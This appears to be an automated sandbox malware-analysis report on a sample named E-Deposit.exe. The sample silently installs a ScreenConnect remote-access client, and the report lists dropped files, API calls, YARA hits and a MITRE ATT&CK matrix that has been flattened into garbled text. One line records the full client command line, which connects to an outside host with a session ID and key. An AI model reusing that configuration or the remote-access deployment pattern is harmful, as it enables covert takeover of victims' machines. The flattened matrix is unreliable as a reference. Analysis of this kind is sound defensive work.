                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 3410000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 1990000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6AA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6270000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6AA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 6AA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: 8D20000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 2110000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 1FA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 1AA00000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID590.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID7B3.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\E-Deposit.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7708Thread sleep count: 40 > 30Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7832Thread sleep time: -34000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7876Thread sleep time: -60000s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  .NET source code references suspicious native API functions
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: 0.2.E-Deposit.exe.3370000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Users\user\Desktop\E-Deposit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 7_2_05CB17B8 CreateNamedPipeW,7_2_05CB17B8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 7_2_017B4C63 RtlGetVersion,7_2_017B4C63
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Modifies security policies related information
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: E-Deposit.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.E-Deposit.exe.5c50000.10.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.6f0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.E-Deposit.exe.5c50000.10.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.2a7fa10.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.b95db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.ae63d4.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.E-Deposit.exe.ad0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1678535852.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: E-Deposit.exe PID: 7276, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7468, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7728, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF85B4BC076AE408FE.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF86AC890801A3F764.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\59d35d.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFC2C1B5F26C92D1A2.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF0DB2C6A1117BC15C.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF324137F551FF48C3.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSID57F.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts                                  		1
                                  Native API                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		11
                                  Disable or Modify Tools                                  		OS Credential Dumping11
                                  Peripheral Device Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		12
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media                                  		12
                                  Command and Scripting Interpreter                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  File and Directory Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain AccountsAt1
                                  Component Object Model Hijacking                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Obfuscated Files or Information                                  		Security Account Manager14
                                  System Information Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive2
                                  Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts                                  		1
                                  Valid Accounts                                  		1
                                  Software Packing                                  		NTDS1
                                  Security Software Discovery                                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service                                  		1
                                  Access Token Manipulation                                  		1
                                  Timestomp                                  		LSA Secrets2
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit                                  		2
                                  Windows Service                                  		1
                                  DLL Side-Loading                                  		Cached Domain Credentials31
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection                                  		1
                                  DLL Search Order Hijacking                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
                                  Masquerading                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Valid Accounts                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                  Access Token Manipulation                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task31
                                  Virtualization/Sandbox Evasion                                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers13
                                  Process Injection                                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Hidden Users                                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Bootkit                                  		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                                  Identify RolesWeb ServicesMasquerade as Legitimate ApplicationJavaScriptValid AccountsDynamic-link Library Injection1
                                  Rundll32                                  		Brute ForceCloud GroupsAttack PC via USB ConnectionEmail Forwarding RuleMulti-hop ProxyExfiltration Over Web ServiceEndpoint Denial of Service

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
